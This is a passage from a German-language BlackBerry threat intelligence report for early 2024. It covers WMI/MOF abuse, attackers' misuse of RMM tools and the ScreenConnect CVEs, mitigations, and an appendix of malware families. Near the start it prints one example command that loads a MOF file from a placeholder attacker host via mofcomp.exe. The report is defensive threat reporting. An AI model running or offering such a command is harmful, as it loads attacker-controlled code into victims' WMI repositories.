- MOF-Anweisungen werden vom Dienstprogramm mofcomp.exe geparst und fügen die in der Datei definierten Klassen und Klasseninstanzen dem WMI-Repository hinzu
Example Command:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof
Tools für die Fernüberwachung und -verwaltung (Remote Monitoring and Management, RMM) werden häufig von Managed IT Service Providern (MSPs) eingesetzt, um die Endgeräte ihrer Kunden aus der Ferne zu überwachen. Leider ermöglichen RMM-Tools auch Bedrohungsakteuren den Zugriff auf dieselben Systeme. Diese Tools bieten eine Reihe von Verwaltungsfunktionen und ermöglichen es den Bedrohungsakteuren, sich durch die Verwendung vertrauenswürdiger und zugelassener Tools zu tarnen.
Im Jahr 2023 stand der Missbrauch von RMM-Tools aufgrund von Berichten über Scattered Spider im Mittelpunkt, einer Cyberangriffsgruppe, die hinter den Angriffen auf MGM Resorts International im September 2023 vermutet wird. Die Mitglieder von Scattered Spider gelten als erfahrene Social-Engineering-Experten und setzen verschiedene Techniken wie SIM-Swap-Angriffe, Phishing und Push-Bombing ein. Bei ihren Angriffen haben sie eine Reihe von RMM-Tools eingesetzt, wie z. B.:
- Splashtop
- TeamViewer
- ScreenConnect
Seit der Entdeckung von zwei Sicherheitslücken in ConnectWise ScreenConnect (alle Versionen unter 23.9.8) im ersten Berichtszeitraum des Jahres 2024 ist die Aufmerksamkeit für RMM-Tools unverändert hoch. Die CVE-Details finden Sie unten:
CVE-2024-1709
CWE-288: Umgehung der Authentifizierung über einen alternativen Pfad oder Kanal.
CVE-2024-1708
CWE-22: Unzulässige Beschränkung eines Pfadnamens auf ein eingeschränktes Verzeichnis ("path traversal").
Das nachstehende Schaubild veranschaulicht die in diesem Berichtszeitraum am häufigsten beobachteten RMM-Tools.
Bei unserer Analyse haben wir festgestellt, dass viele Kunden mehrere RMM-Tools verwenden, was die Angriffsfläche und das Risiko für das Unternehmen erhöht. Zu den vorgeschlagenen Abhilfemaßnahmen gehören:
Audit von Fernzugriffs-Tools (RMM-Tools)
- Identifizierung der derzeit verwendeten RMM-Tools in der Umgebung.
- Bestätigen Sie, dass sie in der Umgebung zugelassen sind.
- Wenn Sie mehrere RMM-Tools verwenden, prüfen Sie, ob diese konsolidiert werden können. Durch die Reduzierung der Anzahl der verschiedenen Tools wird das Risiko verringert.
Deaktivieren von Ports und Protokollen
- Blockieren Sie die ein- und ausgehende Netzwerkkommunikation zu häufig verwendeten Ports, die mit nicht zugelassenen Fernzugriffstools verbunden sind.
Protokolle routinemäßig prüfen
- Erkennung der anormalen Verwendung von Fernzugriffstools.
Patching
- Regelmäßige Überprüfung der mit den verwendeten RMM-Tools verbundenen Schwachstellen und ggf. Aktualisierung.
- Über das Internet zugängliche Software wie RMM-Tools sollten bei der Durchführung regelmäßiger Patch-Zyklen stets hohe Priorität haben.
Segmentierung des Netzes
- Minimieren Sie seitliche Bewegungen, indem Sie das Netzwerk segmentieren und den Zugriff auf Geräte und Daten beschränken.
Gerätekennzeichnung
- Finden Sie heraus, ob Ihr Sicherheitsanbieter Optionen zur Kennzeichnung von Geräten anbietet, die RMM-Tools verwenden. Wenn ja, aktivieren Sie dies, um sicherzustellen, dass das SOC Einblick hat. Einige Anbieter bieten die Möglichkeit, eine Notiz/Markierung zu hinterlassen, die genehmigte Tools/Aktivitäten identifiziert, was Analysten bei Untersuchungen sehr hilft.
Speicher-Laden RMM
- Verwenden Sie Sicherheitssoftware, die Fernzugriffe erkennen kann, die nur im Speicher geladen werden.
Schlussfolgerung
Dieser 90-Tage-Bericht soll Ihnen helfen, auf dem Laufenden zu bleiben und auf künftige Bedrohungen vorbereitet zu sein. Angesichts der sich schnell verändernden Bedrohungslandschaft im Bereich der Cybersicherheit ist es hilfreich, sich über die neuesten Sicherheitsnachrichten für Ihre Branche, geografische Region und die wichtigsten Themen auf dem Laufenden zu halten. Hier sind unsere wichtigsten Erkenntnisse für Januar bis März 2024:
- Weltweit stoppte BlackBerry 37.000 Angriffe pro Tag, die sich gegen unsere Kunden richteten, wie unsere interne Telemetrie zu gestoppten Angriffen zeigt. Wir haben einen starken Anstieg der einzelnen Schadprogramme festgestellt, die auf unsere Mieter und Kunden abzielen, und zwar um 40 Prozent pro Minute im Vergleich zum vorherigen Berichtszeitraum. Dies könnte darauf hindeuten, dass Bedrohungsakteure umfangreiche Maßnahmen ergreifen, um ihre Opfer gezielt anzugreifen.
- Infostealer waren in unseren Abschnitten über kritische Infrastrukturen, kommerzielle Unternehmen und Top-Bedrohungen sehr präsent. Dies deutet darauf hin, dass sensible und private Daten von Bedrohungsakteuren in allen geografischen Regionen und Branchen sehr begehrt sind.
- Wie in unserem neuen Abschnitt über Ransomware, der die wichtigsten Ransomware-Gruppen beschreibt, hervorgehoben wird,zielt Ransomwarezunehmend auf kritische Infrastrukturen ab, insbesondere auf das Gesundheitswesen.
- Die Ausnutzung von CVEs hat sich im letzten Jahr rapide ausgeweitet und wird sich fortsetzen. BlackBerry verzeichnete in den letzten drei Monaten fast 9.000 neue CVEs, die vom NIST veröffentlicht wurden. Darüber hinaus wurden mehr als 56 Prozent dieser offengelegten Schwachstellen mit einem Schweregrad von über 7,0 bewertet. Sicherheitslücken im Zusammenhang mit stark genutzter legitimer Software wie ConnectWise ScreenConnect, GoAnywhere und mehreren echten Ivanti-Produkten wurden von Bedrohungsakteuren in alarmierendem Ausmaß ausgenutzt, um eine ganze Reihe von Schadprogrammen auf nicht gepatchte Opferrechner zu übertragen.
- Politische Täuschungen durch Deepfakes und Fehlinformationen verbreiten sich zunehmend über soziale Medien und werden auch in Zukunft ein Problem darstellen, insbesondere im Zusammenhang mit der russischen Invasion in der Ukraine, dem sich anbahnenden Nahostkonflikt und den bevorstehenden US-Präsidentschaftswahlen im November.
Weitere Informationen über die wichtigsten Bedrohungen für die Cybersicherheit und deren Abwehrmöglichkeiten finden Sie im BlogBlackBerry .
Danksagung
Dieser Bericht ist das Ergebnis der gemeinsamen Bemühungen unserer talentierten Teams und Einzelpersonen. Insbesondere möchten wir folgenden Personen unsere Anerkennung aussprechen:
Anhang: Bedrohungen für kritische Infrastrukturen und Wirtschaftsunternehmen
8Base Ransomware: Eine besonders aggressive Ransomware-Gruppe, die erstmals im Jahr 2023 auftrat. In ihrer kurzen Geschichte war sie äußerst aktiv und hatte es häufig auf Opfer in Nordamerika und den LATAM-Ländern abgesehen. Die Bedrohungsgruppe nutzt eine Mischung aus verschiedenen Taktiken, um sich zunächst Zugang zu verschaffen, und kann dann auch Schwachstellen in den Systemen der Opfer ausnutzen, um ihre potenzielle Auszahlung zu maximieren.
Amadey (Amadey Bot): Ein multifunktionales Botnet mit modularem Aufbau. Sobald es auf dem Gerät eines Opfers gelandet ist, kann Amadey Befehle von seinen C2-Servern empfangen, um verschiedene Aufgaben auszuführen, nämlich Informationen zu stehlen und zusätzliche Nutzlasten zu verteilen.
Buhti: Buhti ist eine relativ neue Ransomware-Operation, die Varianten der geleakten Ransomware-Familien LockBit 3.0 (auch bekannt als LockBit Black) und Babuk verwendet, um Windows- und Linux-Systeme anzugreifen. Darüber hinaus ist bekannt, dass Buhti ein benutzerdefiniertes, in der Programmiersprache Go" geschriebenes Dienstprogramm zur Datenexfiltration verwendet, um Dateien mit bestimmten Erweiterungen zu stehlen. Die Ransomware-Betreiber haben auch schon andere schwerwiegende Fehler ausgenutzt, die sich auf die Dateiaustauschanwendung Aspera Faspex von IBM (CVE-2022-47986) und die kürzlich gepatchte Sicherheitslücke PaperCut (CVE-2023-27350) auswirken.
LummaStealer (LummaC2): C-basierter Infostealer, der auf kommerzielle Unternehmen und kritische Infrastrukturen abzielt und sich darauf konzentriert, private und sensible Daten vom Gerät des Opfers zu exfiltrieren. Dieser Infostealer wird häufig über Untergrundforen und Telegram-Gruppen beworben und verbreitet und stützt sich bei seiner Verbreitung auf Trojaner und Spam.
PrivateLoader: Eine berüchtigte Downloader-Familie, die sich seit 2021 in freier Wildbahn befindet und vor allem auf kommerzielle Unternehmen in Nordamerika abzielt. PrivateLoader (wie der Name schon sagt) ist ein Mechanismus für den Erstzugang, der es ermöglicht, eine Vielzahl bösartiger Nutzdaten auf die Geräte der Opfer, insbesondere Infostealer, zu bringen. PrivateLoader betreibt ein Vertriebsnetz über einen unterirdischen Pay-per-Install (PPI)-Service, um seine weitere Nutzung und Entwicklung zu finanzieren.
RaccoonStealer: MaaS Infostealer. Der RaccoonStealer ist seit 2019 in freier Wildbahn und hat seine Fähigkeiten verbessert, Sicherheitssoftware und herkömmliche AV-Software zu umgehen. Laut der internen Telemetrie von BlackBerrywurde RaccoonStealer dabei beobachtet, wie er kommerzielle Unternehmen in Nordamerika angriff.
RedLine (RedLine Stealer): Ein weit verbreiteter Malware-Infostealer, der häufig über MaaS verkauft wird. Das Hauptmotiv der Bedrohungsgruppe, die die Malware verbreitet, scheint hauptsächlich finanzieller Gewinn und nicht Politik, Zerstörung oder Spionage zu sein. Aus diesem Grund hat RedLine aktiv eine Reihe von Branchen und geografischen Regionen ins Visier genommen.
Remcos (RemcosRAT): Ein kommerzieller RAT, der zur Fernsteuerung eines Computers oder Geräts verwendet wird. Obwohl als legitime Software beworben, wurde die Fernsteuerungs- und Überwachungssoftware oft als Fernzugriffstrojaner verwendet.
SmokeLoader: Eine weit verbreitete Malware mit einer Fülle von Fähigkeiten, insbesondere der Verbreitung anderer Malware auf dem Gerät des Opfers. SmokeLoader ist eine wiederkehrende Bedrohung, die von BlackBerry in mehreren Global Threat Intelligence Reports beobachtet wurde. In diesem Berichtszeitraum wurde die Malware bei kommerziellen und professionellen Dienstleistungen in Nordamerika beobachtet.
Vidar (VidarStealer): Ein Commodity-Infostealer, der sich seit 2018 in freier Wildbahn befindet und sich zu einer stark bewaffneten Malware-Familie entwickelt hat. Angreifer konnten Vidar bereitstellen, indem sie Schwachstellen in der beliebten ScreenConnect RRM-Software von ConnectWise ausnutzten. Diese beiden CVEs, CVE-2024-1708 und CVE-2024-1709, ermöglichten es Bedrohungsakteuren, kritische Systeme zu umgehen und darauf zuzugreifen.